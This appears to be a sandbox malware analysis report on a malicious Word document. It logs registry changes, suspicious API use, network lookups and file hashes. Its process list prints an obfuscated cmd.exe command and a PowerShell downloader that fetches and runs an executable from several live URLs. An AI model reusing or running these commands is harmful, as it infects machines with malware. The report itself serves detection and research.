| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\CMd.exe
CMd /V:/C"^se^t -^@^$=-_\^ _/- ^\-_ /-\ /^-^_ \^-^_^ /\^_^ _/^\^ ^_/^\^ /-^\ /^-^_ /-^_^ -_^\ ^_/^\ ^\/^_ -\^_^ /^-_ ^-\^_}^-^\/}\/^-^{/_\^h\/^-c-_\^t^_-/a/^\_c/^_\^}/_-;-/^_^k\^_^-^a-\/^e/\-r^-_^\b^_/\;^-^_\j/^-^\^j\^_-^a/^_-$^_-\^ ^_^-^\^m\_/^e/_\^t^\/-I-\_-_^-\e^_^\/^k^\_^-^o/_^\v/\^-n-/\^I/_-^;\/^-)^_-/^j^_\/^j-/^_^a^-/\^$/_^\ /\_^,_\/^T^_/-N_/^\V^-\_$_/\(-/_^e_^-/l/\^_^i/^\^_^F^_\-^d_^\/a\/^-o/_^\l_/-n^-^\/w^-_^\^o^_-/D/\^-^._/^\T^\/^_o^\/^-S\-/$^-^_^\^{_/-y^-/^_r_\/^t^-_/{/_\)/-_^i\-/^z/^\^-b/^-\^$-^_/ \^_/n-/_^i/^\-^ /\-T^_^\/N^-_/V_/-$^\/-(^-_/h^\/^-c\/_^a\^_/e/\^-r^\_^-o^_/-^f-^_\;-^\_'^\/-e^\_/x^-^_\^e^-/_^./-^_'/^\^-+/^\-p/_-q-\/j-_^\$\_/^+/\-^'/^\^_\^_\/^'/^-^_^+^-^\^_c/_^-i/_^\l-/^_^b-\/u^\_^-^p^-^\^_^:-^\/v^_/\n^-/^_e/\-^$/_\^=/_-j^_\-j/-^_a_^\^-^$-_/;^-/\^'_^\/7/-^_^7^-\^_1_^\/'^_\/ /\_^=/^-_^ _/^\^p/\^_^q/^\^_^j^\^-^_$\/^_^;/-\)\/^-^'\^_-^@^\_/'-^_\(/^-^_^t^\_^-^i_^-^\l^_/-p^-^_\S/\^_.^-^\_'\-_^E\-/^7_/^-^4-_\e-/^_^e/^_-v/^-_U^_^-^\x\^-^_//\^-^g/^_^\r\/^-o_-/.\/^-^s^_^-^\e^\/_e^\/_r\/-^g\/^_^e/^-^\d/_^\^0-^\_^5-_^\^3^-/^_//-^_//^\-^:-/^\p^-/^\^t-/^_^t\/^-^h\-/^@^-\_m\^_-X-^\_^1/_\c-\_w^\^-_/\_^-^u\/^_r\^-_^.^-/\r^_/^-e-/\v-/\^t^\/^-^--\^_r-/_u^-/^_^t-^_/^1^_^\^-0^-/\0/\^_^1_/\//^_\/^\/^-^:/^-^\^p/_^-^t/^_\^t-_/h^\^_^-^@\^_/^b_^-^\n_\///^\^-n^_/^\v_^-/.^_^-\g/_^\n^\/^_^a_/^\r^_/^-^t\_^-^t-\/^a_/-^b_^-/^a^_-/^o^_^-\h^\/^-^h-^_/n/^_^-^i/^-\^t/_\//\^-/^-^_/^:/_^-^p-/^_^t_^\^-^t^\-/^h^_^\/^@^_^\^-^p-^_\X\^_^-c_^\/1\/-m^_-\E_/^\//_\g/^-^_r^-\/o^_^-/^.\^-^_^h^-/^_^a\/^_^m^\-_^t^-^_/^a\^_//^-^_\/^\^-_:-^_^\p^_^-/t/\^_t^-_^\h/^\-^@/-\p\-_R-_^\^6^\^-/E^\/^_v^_^\-^q-/_/^_/^-^m-_^\o-/^\c^_/^\./-^_x\/^_^u^-\/l^-^\^_^e_/-v^-_\^o^\/^_n/\_.^\^-^_e^-/\t/^\_^o/^-^\n_/\b-^\^_/\/-/^_^-/^:^-\/^p/\^-^t^\-/t^_^-\^h^\^_-^'/^_^\=-/_i^-^\_^z/_^\^b^-/\^$-/^_;-/^_^t^_\/n^-_/e^\/^_^i^\^_^-l/^_\C^_\^-^b_-/^e\/_^W^-^\/.^\-/t-/^_e^_^-/N^\/^_ -/\t-/_c^\_/^e/\-j-\^_^b^-\_^o-\_--\/w/^-_^e^_/^-n^_\^-=^_^-/^T^_/^-^o^_/^-^S\/_$\_^-^ ^\/^_l_^\-^l^\-/e^\^_^-^h\/^_^s\-^_r/^-\^e-/_w\-_o-/^_^p&&^f^or /L %n ^in (^14^1^9^,^-^4^,^3)^d^o ^s^et ^},^#=!^},^#!!-^@^$:~%n,1!&&^i^f %n ^eq^u ^3 c^al^l %^},^#:~-^35^5%"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $SoT=new-object Net.WebClient;$bzi='http://bnote.novelux.com/qvE6Rp@http://atmah.org/Em1cXp@http://tinhhoabattrang.vn/nb@http://1001tur-tver.ru/wc1Xm@http://350degrees.org/xUvee47E'.Split('@');$jqp = '177';$ajj=$env:public+'\'+$jqp+'.exe';foreach($VNT in $bzi){try{$SoT.DownloadFile($VNT, $ajj);Invoke-Item $ajj;break;}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bnote.novelux.com | udp |
| US | 8.8.8.8:53 | atmah.org | udp |
| MY | 124.217.255.56:80 | atmah.org | tcp |
| US | 8.8.8.8:53 | tinhhoabattrang.vn | udp |
| VN | 103.221.223.55:80 | tinhhoabattrang.vn | tcp |
| US | 8.8.8.8:53 | 1001tur-tver.ru | udp |
Files
memory/2888-0-0x000000002FCC1000-0x000000002FCC2000-memory.dmp
memory/2888-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2888-2-0x0000000070C8D000-0x0000000070C98000-memory.dmp
memory/2888-6-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-7-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-9-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-14-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-13-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-12-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-11-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-10-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-47-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-44-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-45-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-38-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-37-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-32-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-31-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-29-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-20-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-15-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-8-0x0000000000540000-0x0000000000640000-memory.dmp
memory/2888-62-0x0000000070C8D000-0x0000000070C98000-memory.dmp
memory/2888-63-0x0000000000540000-0x0000000000640000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 4cfc38d8344faf34a0520fc59718e1d1 |
| SHA1 | 056da80d361ae93b36555dcaf433e3b5863c518d |
| SHA256 | bc9852cd4b27a9e81d4f7e031dbe0b259cc9e3ba85370d22196ec314a1a3bd51 |
| SHA512 | d763863bb91f11ee3e4783d3c45032e246640ecbb575a529b17f8e239c88a1dd0d2d8216de0a8323d302f6722e0c9f9e6e970544bb530abf8b9a2df88c05cbb7 |
memory/2888-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2888-79-0x0000000070C8D000-0x0000000070C98000-memory.dmp